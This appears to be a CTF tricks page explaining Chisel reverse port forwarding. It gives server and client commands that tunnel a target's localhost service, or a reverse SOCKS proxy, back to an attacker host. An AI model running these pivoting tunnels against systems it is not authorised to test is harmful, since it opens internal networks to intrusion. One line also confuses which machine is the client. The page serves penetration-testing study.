> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-10/port-forwarding/trick-0214.md).

# Chisel Reverse Port Forwarding

***

Set up a reverse port forward using Chisel to access a service running on the target's local network or localhost from your attacker machine. This is useful when the target can connect out to you, but you cannot connect directly to the target's internal IP or specific ports.

On your attacker machine, start the Chisel server in reverse mode, listening for connections:

```bash
./chisel server --reverse --port 5555
```

On the target machine, execute the Chisel client command, connecting back to your attacker machine's IP and server port (5555). The `R:` prefix specifies a reverse tunnel. The format `R:local_attacker_port:remote_target_ip:remote_target_port` tells Chisel to forward connections arriving on `local_attacker_port` (e.g., 8080 on your machine) through the tunnel to `remote_target_ip:remote_target_port` (e.g., 127.0.0.1:8080 from the target's perspective):

```bash
./chisel client <attacker_ip>:5555 R:8080:127.0.0.1:8080
```

The `R:8080:127.0.0.1:8080` part specifies the reverse tunnel configuration. It means that any connection made to port 8080 on the attacker machine will be forwarded through the tunnel to 127.0.0.1:8080 on the target machine. The format `R:local_port:remote_ip:remote_port` means that connections to `local_port` on the server (attacker machine) will be forwarded through the tunnel to `remote_ip:remote_port` on the client (target machine).

Once connected, you can access the service running on the target at `127.0.0.1:8080` by connecting to `127.0.0.1:8080` on your attacker machine.

You can also set up a SOCKS proxy in reverse mode. This allows you to proxy traffic from your attacker machine through the target. The command is simple:

```bash
./chisel client <attacker_ip>:5555 R:socks
```

This creates a reverse SOCKS proxy on the client machine (attacker). By default, Chisel will use port 1080 for the SOCKS proxy. Connections made to the SOCKS proxy on the attacker machine (default port 1080) will be forwarded through the tunnel and exit from the target machine's network.
